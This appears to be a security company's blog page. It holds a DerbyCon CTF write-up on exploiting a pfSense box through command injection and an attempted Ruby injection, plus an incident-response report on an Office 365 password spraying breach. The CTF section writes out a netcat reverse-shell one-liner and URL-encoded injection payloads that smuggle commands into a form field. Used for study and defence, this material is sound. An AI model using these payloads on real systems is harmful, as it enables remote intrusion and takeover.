On reflection, we believe this could be made much more succinct with:

  • 0';/sbin/ping -c 1;'

We think all of our escaping problems were down to the termination of the command with the appropriate number of quotes but, as previously stated, during the competition we went with the longer version as it just worked.

Next step… how do we get a shell?

pfSense is a cut down version of FreeBSD under the hood. There is no wget, there is no curl. Yes, we could write something into the web directory using cat but instead we opted for a traditional old-school Linux reverse shell one liner. Thank you to @PentestMonkey and his cheat sheet (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet):

  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 12345 >/tmp/f

We fired up a netcat listener on our end and used the above as part of the full parameter:

  • 0'; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 12345 >/tmp/f;/usr/sbin/pw groupmod test -g 2003 -M '0

Or, when URL encoded and part of the members parameter in the post request:

  • &members=%5B%5D=0'%3brm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+>/tmp/f%3b/usr/sbin/pw+groupmod+test+-g+2003+-M+'0

With the attack string worked out, we triggered the exploit by moving a user into a group and hitting save.

Apologies for the quality of the following photographs – blame technical problems!

This caused the code to run, create a reverse connection back to us and allowed us to capture the final flag of the pfSense challenge contained in  /root/flag.txt.

And with that, we obtained 5000 points, along with the first of two TrustedSec challenge coins awarded to our team.

DPRK Strategic Missile Attack Planner

This box presented a text based game over telnet.

We thought that this box was going to be a lot harder than it turned out to be and, after spending a while trying a few things, we made a tactical decision to ignore it. Somewhat frustratingly for us, that was the wrong move and compromising this box turned out to be very achievable.

From the help command, we thought that that it might be Ruby command injection. After chatting with the SwAG team after the end of the CTF, we learned that this was correct and it was a case of finding the correct spot to inject Ruby commands. Props to SwAG and other teams for getting this one, and thanks to the DerbyCon CTF organisers for allowing us to grab some screenshots after the competition had finished in order to share this with you. We’ll share what we know about this box, but wish to make it clear that we failed to root it during the competition.

We were supplied with a help command, which lead us to suspect Ruby command injection was at play. The help command printed out various in game commands as well as public/private functions. A small sample of these were as follows:

  • target=
  • position
  • position=
  • id
  • yield=
  • arm!
  • armed?

The ones that helped us to identify that it was Ruby code behind the scenes were:

  • equal?
  • instance_eval
  • instance_exec

We attempted a few attack vectors manually, but we needed a way to automate things; it was taking too long to manually attempt injection techniques. To do this we generated a custom script using expect. In case you don’t know about expect, the following is taken directly from Wikipedia:

“Expect, an extension to the Tcl scripting language written by Don Libes, is a program to automate interactions with programs that expose a text terminal interface.”

We often have to throw custom scripts together to automate various tasks, so if you’re not familiar with this it’s worth a look. The code we implemented to automate the task was as follows:

We then took all of the commands from the game and ran this through this expect script:

  • cat commands | xargs -I{} ./expect.sh {} | grep "Enter Command:" -A 1

After identifying what we thought was the right sequence within the game, we then tried multiple injection techniques with no success. A sample of these are shown below:

  • cat commands | xargs -I{} ./expect.sh {} print 1 | grep "Enter Command:" -A 1
  • cat commands | xargs -I{} ./expect.sh {}&& print 1 | grep "Enter Command:" -A 1
  • cat commands | xargs -I{} ./expect.sh {}|| print 1 | grep "Enter Command:" -A 1
  • cat commands | xargs -I{} ./expect.sh {}; print 1 | grep "Enter Command:" -A 1

We also tried pinging us back with exec or system as we didn’t know if the response would be blind or show the results back to the screen:

  • cat commands | xargs -I{} ./expect.sh {} exec(ping

It was not easy to identify the host operating system, so we had to make sure we ran commands that would work on both Windows and Linux. No ports other than telnet were open and you couldn’t even ping the host to find the TTL as there was a firewall blocking all other inbound connections.

In the end, we were not successful.

After discussing this with team SwAG post CTF, they put us out of our misery and let us know what the injection technique was. It was a case of using the eval statement in Ruby followed by a back ticked command, for example:

D’oh! It should also be noted that you couldn’t use spaces in the payload, so if you found the execution point you would have had to get around that restriction, although doing so would be fairly trivial.

Automating re-exploitation

Finally, a quick word about efficiency.

Over the course of the CTF a number of the machines were reset to a known good state at regular intervals because they were crashed by people running unstable exploits that were never going to work *cough*DirtryCow*cough*. This meant access to compromised systems had to be re-obtained on a fairly regular basis.

In an effort to speed up this process, we threw together some quick scripts to automate the exploitation of some of the hosts. An example of one of them is shown below:

It was well worth the small amount of time it took to do this, and by the end of the CTF we had a script that more or less auto-pwned every box we had shell on.


We regularly attend DerbyCon and we firmly believe it to be one of the highest quality and welcoming experiences in the infosec scene. We always come away from it feeling reinvigorated in our professional work (once we’ve got over the exhaustion!) and having made new friends, as well as catching up with old ones. It was great that we were able to come first in the CTF, but that was just the icing on the cake. We’d like to extend a big thank you to the many folks who work tirelessly to put on such a great experience – you know who you are!


Lifting the clouds from cloud investigations

Nettitude’s IR team recently had an opportunity to investigate a breach in a cloud environment. The client had recently adopted Office 365 in a hybrid configuration to host a range of Microsoft services for users, including email and SharePoint. They had seen very heavy traffic on their web application and traced the activity back to an admin user. They had seen that this user had requested a password change for the web application; the new credentials were sent to the users corporate email account, therefore the assumption was that the users corporate email account was compromised. Several other user accounts had also requested password resets in the web application around the same time as the suspect administrator account. We were asked to determine if the corporate accounts had been compromised and, if so, how.

Office 365

This was a good opportunity to investigate Office 365 installations. Some interesting discoveries were made, which will be shared in this post.

We discovered that Multi-Factor Authentication (MFA) was not enabled for the cloud environment. MFA is not enabled by default when Office 365 is deployed. In addition it is not possible to configure the lock-out policy for failed logon attempts beyond the default 10 failures.

We quickly developed a hypothesis that the impacted accounts had been brute forced. The client informed us that they had already eliminated this possibility from an analysis of the log files; there were no extensive incidents of failed logons in the time leading up to the suspected compromise. We therefore requested access to the audit logs in Office 365 in order to validate their findings. The audit log interface can be found in the Security & Compliance Centre component of the web interface.

Anyone who has had to do a live analysis of Office 365 will know that it can be a frustrating experience. The investigator is presented with a limited web interface and must configure their search criteria in that interface. Results are presented in batches of 150 logs; to view the next 150 results the investigator must pull down a slider in the web interface and wait, often for minutes, before the results are presented. You then repeat this process in order to view the next batch of 150 logs, and so on.

You will find that analysis is much quicker if you use the “export” feature to export all of the filtered audit logs to a spreadsheet. However, this will present the investigator with a new set of challenges. Firstly, you should understand that auditing, when enabled, will log a vast array of user operations, many of which will not be relevant to the investigation. Secondly, the exported logs are not very user friendly at all. Each record consists of 4 fields:

  • CreationDate
  • UserID
  • Operations
  • AuditData

There are a vast array of key-value pairs, many of which are concatenated into a single field named AuditData. Thus an example of a single record might look something like this (much of the data has been edited to obscure traceable indicators)

The structure is not static across all records; the contents of the AuditData field will change depending what user operation has been performed. Therefore there will be a varying number of key-pair fields present which makes writing a parser challenging. Fortunately, Microsoft have published both the detailed audit properties and the Office 365 management activity API schema that we can use to understand the data in the audit logs.

Log Analysis

In the absence of an existing parser, we had a requirement to quickly process these logs so that the data could be analysed and presented in an understandable format. Realising that the data was structured, albeit with variable numbers of key-value pairs, we turned to our Swiss army knife for structured data – Microsoft Log Parser and Log Parser Studio front end.

For those not familiar with this tool, it is produced by Microsoft and allows a user to execute SQL-like queries against structured data to extract fields of interest from that data. We have previously published some LogParser queries to process sysmon event logs.

We wrote some quick and dirty queries to process exported Office 365 audit data. They are by no means comprehensive, but they should be sufficient to get you started if you need to analyse Office 365 audit log data. We are therefore publishing them for the wider community in our Github repository.

Below is an example of the LogParser query that we wrote to extract Failed Logon operations from the audit logs:

Analysis Results

Our initial analysis of the audit data matched the client’s findings; there was very little indication of failed logons to the impacted accounts prior to the suspected breach. However, our initial analysis was “vertical”; that is to say that it cussed on a single user account suspected of being compromised. We know from the daily investigations that we perform for our clients using our SOC managed service, that you don’t get the full picture unless you do both a vertical AND horizontal analysis. A horizontal analysis is one that encompasses all user accounts across a particular time-frame – normally one that includes the suspected time of a compromise.

We therefore re-oriented our investigation to perform a horizontal analysis. We exported all of the Office 365 audit data for all operations on all user accounts across a 30 minute time frame in the early hours of the morning of the suspected breach, when you would expect very little user activity. Our first finding was that there was significant volume of activity in the logs encompassing every single user account in the client’s estate. Once we applied our LogParser queries to the log data, it immediately became clear how the attack had occurred and succeeded. The data now showed the unmistakable fingerprint of a password spraying attack.

Password Spraying

Password spraying is a variation on traditional brute force attacks. A traditional brute force is directed against a single user account; a dictionary of potential passwords are attempted in sequence until the correct one is found or the dictionary is exhausted, in which case the attacker will configure a new account name to attack, then launch the dictionary attack on that account. However, an entry in a log file may be recorded for each failed attempt, so any organisation monitoring logs for failed attempts could detect this attack. In addition, the way to defend your organisation against such attacks is to configure a lock-out threshold on each user account, so that no further attempts to authenticate are permitted after a pre-configured number of failed attempts within a specified time frame.

Password spraying is a technique used by attackers to circumvent the previously described controls. Instead of attacking a single user account, the technique involves attacking a large number of accounts but with a potentially smaller dictionary. So if an attacker has a list of 300 user accounts and a dictionary of 2 passwords, the sequence of the attack would be:

  • UserAcct1: Password1
  • UserAcct2: Password1
  • UserAcct3: Password1
  • <snip>
  • UserAcct300:Password1
  • UserAcct1: Password2
  • UserAcct2: Password2
  • UserAcct3: Password2
  • <etc>

If the attacker is smart, they will throttle the attack in order to avoid any potential lock-out time thresholds. By the time the second password attempt is attempted on any particular account, hopefully (from the attacker’s point of view), the account will have moved outside of the lock-out threshold time frame. That is what happened in our investigation; the attacker had a list of over 1000 user accounts and was throttling their attack so that although they were trying one username/password combination per second, any particular user account was only subjected to about 2 password guesses per hour. This illustrates the value of conducting both horizontal and vertical analysis.

Analysis Conclusions

Our analysis concluded that 12 accounts had been successfully compromised during the password spraying attack. The indications were that the attacker only needed a dictionary of 100 potential passwords (or less) to compromise those 12 accounts. The average number of password guesses across the compromised accounts was around 60 before compromise, while the least amount of guesses required to compromise an account was 16. It was determined that the attack had been ongoing for over 24 hours before any component of the attack was detected.

It was determined that the client was using a password policy of a minimum of 8 character passwords, which is the default password policy for Office 365.

Investigation Curiosities

It was noted, during the investigation of the Office 365 logs, that the logs were inconsistent in terms of recording successful logons. We found analysis of the logs from the Clients AzureAD installation gave a much higher-fidelity view of successful logons.

There were also anomalies in the time stamps of some of the operations recorded in the Office 365 audit logs. We determined that users were spread over a number of different time zones and concluded that they had failed to configure the correct time zone when they first logged in to their Office 365 accounts. This can have a significant negative impact on the accuracy of the audit logs in Office 365 – we therefore advise all investigators to be cognisant of this issue.

The attacker appeared to have a very accurate and comprehensive list of valid user accounts relevant to the target organisation. We concluded that that this was obtained during a previous compromise of a user account within the organisation wherein the attacker downloaded the Global Address Book from the compromised account.


To summarise, the takeaways from this investigation:

  • Ensure MFA is enabled on your O365 installation.
  • Educate your users about password security.
  • Watch your logs; consider implementing a SIEM solution.
  • Export the logs from both O365 and Azure AD during an investigation.
  • Conduct a horizontal and vertical analysis of user logs for most accurate results.
  • Ensure that all users configure their correct time zone when they first log in to Office365.

CVE-2017-8116: Teltonika router unauthenticated remote code execution

We sometimes require internet connectivity in situations where a traditional connection is not easily possible. 4G routers provide an answer to this problem by providing connectivity to a variety of devices and systems without the need for a fixed internet connection.  They typically have one thing in common – a web based management interface. Read more